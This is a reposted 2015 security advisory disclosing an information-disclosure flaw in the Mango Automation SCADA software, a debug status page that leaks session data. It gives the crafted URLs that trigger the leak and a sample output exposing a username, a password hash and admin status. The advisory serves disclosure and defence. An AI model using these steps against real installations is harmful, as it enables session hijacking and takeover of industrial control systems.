Home / os / winmobile

Mango Automation 2.6.0 Unprotected Debug Log View

Posted on 29 September 2015

Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability Vendor: Infinite Automation Systems Inc. Product web page: http://www.infiniteautomation.com/ Affected version: 2.5.2 and 2.6.0 beta (build 327) Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages, etc. It is easy, affordable, and open source. Desc: Mango Automation suffers from information disclosure vulnerability because it contains default configuration for debugging enabled in the '/WEB-INF./web.xml' file (debug=true). An attacker can entice a logged-in user to visit a specially crafted URL which will produce a system exception with stack trace on the Jetty server. When this error occurs, the debug option generates a status page with all the information from the visitor, meaning that the attacker is able to see usernames, password hashes, e-mails and of course, Cookie sessions). Using the generated error, the attacker can easily perform session hijacking and take over the system using previously discovered vulnerabilities by just visiting the status page non-authenticated. Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit Jetty(9.2.2.v20140723) Java(TM) SE Runtime Environment (build 1.8.0_51-b16) Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5260 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php 20.08.2015 -- One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session): - http://localhost:8080/status/ Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page: - http://localhost/status/mango.json?time=$ - http://localhost/status/ Sample status output: "$" SESSION ATTRIBUTES sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=] LONG_POLL_DATA_TIMEOUT=1440143583487 LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa] CONTEXT ATTRIBUTES DwrContainer=org.directwebremoting.impl.DefaultContainer@138158 constants.EventType.EventTypeNames.AUDIT=AUDIT constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN constants.Permissions.DataPointAccessTypes.READ=1 org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158] constants.DataTypes.BINARY=1 constants.UserComment.TYPE_EVENT=1 constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e Also you can list all of the Classes known to DWR: - http://localhost:8080/dwr/index.html

 

TOP